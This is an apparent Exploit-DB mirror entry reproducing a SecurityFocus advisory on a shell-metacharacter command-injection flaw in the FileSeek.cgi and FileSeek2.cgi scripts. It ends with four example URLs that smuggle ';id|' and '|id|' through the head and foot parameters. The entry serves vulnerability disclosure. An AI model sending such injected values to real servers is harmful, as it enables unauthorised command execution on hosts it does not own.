exploit-db-mirror/exploits/cgi/webapps/22227.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
910 B
Text

source: https://www.securityfocus.com/bid/6783/info
FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley &
Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server.
It has been reported that FileSeek.cgi and FileSeek2.cgi do not filter shell metacharacters from web requests. As a result, it is possible for a remote attacker to execute commands on the shell of a host running the vulnerable script. Commands will be executed with the privileges of the webserver process.
This impact of this vulnerability is that an attacker may gain local, interactive access to the host.
http://www.example.com/cgi-bin/FileSeek.cgi?head=&foot=;id|
http://www.example.com/cgi-bin/FileSeek.cgi?head=;id|&foot=
http://www.example.com/cgi-bin/FileSeek.cgi?head=&foot=|id|
http://www.example.com/cgi-bin/FileSeek.cgi?head=|id|&foot=